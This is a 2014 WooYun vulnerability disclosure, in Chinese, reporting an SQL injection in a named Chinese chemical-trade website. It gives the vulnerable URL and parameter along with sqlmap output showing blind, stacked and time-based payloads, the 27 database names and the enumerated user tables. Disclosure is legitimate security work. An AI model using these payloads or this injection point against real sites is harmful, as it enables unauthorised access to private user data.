当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083541

漏洞标题:中国万维化工城SQL注入漏洞(涉及27个数据库大量用户账户)

相关厂商:中国万维化工城

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2014-11-17 12:25

修复时间:2015-01-01 12:26

公开时间:2015-01-01 12:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-01-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国万维化工城SQL注入(涉及27个数据库 大量用户账户)

详细说明:

注入点:http://www.chem.com.cn/BuyUser_show.aspx?id=848991


由于数据库太多 本屌丝机器配置也不会 跑表太慢 所以就截图一部分 并不深入去跑了

00.PNG


0.PNG


1.PNG


漏洞证明:

sqlmap identified the following injection points with a total of 558 HTTP(s) req
uests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=848991 AND 3274=3274
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=848991; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=848991 WAITFOR DELAY '0:0:5'--
---
[22:22:41] [INFO] testing Microsoft SQL Server
[22:22:42] [INFO] confirming Microsoft SQL Server
[22:22:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


available databases [27]:
[*] bizdb
[*] blob
[*] chat
[*] chemdoc_bak
[*] coating
[*] eep
[*] eepcn
[*] engqsjk
[*] gqsjk
[*] gqsjkweb
[*] LumigentDemoDB
[*] master
[*] model
[*] msdb
[*] oversea
[*] Questionnaire
[*] sdk
[*] selphelp
[*] shiyan
[*] tempdb
[*] test
[*] user_news
[*] WEBSITE
[*] wwbbs
[*] wwBuySelldb
[*] wwuserdb
[*] xxwdb


[23:00:34] [INFO] fetching tables for database: wwuserdb
[23:00:34] [INFO] fetching number of tables for database 'wwuserdb'
[23:00:34] [WARNING] running in a single-thread mode. Please consider usage of
ption '--threads' for faster data retrieval
[23:00:34] [INFO] retrieved:
[23:00:36] [WARNING] reflective value(s) found and filtering out
53
[23:00:50] [INFO] retrieved: dbo.aspnet_Applications
[23:04:55] [INFO] retrieved: dbo.aspnet_Membership
[23:07:06] [INFO] retrieved: dbo.aspnet_Paths
[23:08:30] [INFO] retrieved: dbo.aspnet_PersonalizationAllUsers
[23:13:19] [INFO] retrieved: dbo.aspnet_PersonalizationPerUser
[23:15:48] [INFO] retrieved: dbo.aspnet_Profile
[23:17:23] [INFO] retrieved: dbo.aspnet_Roles
[23:18:40] [INFO] retrieved: dbo.aspnet_Sc
......................
......................

修复方案:

你比我懂

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝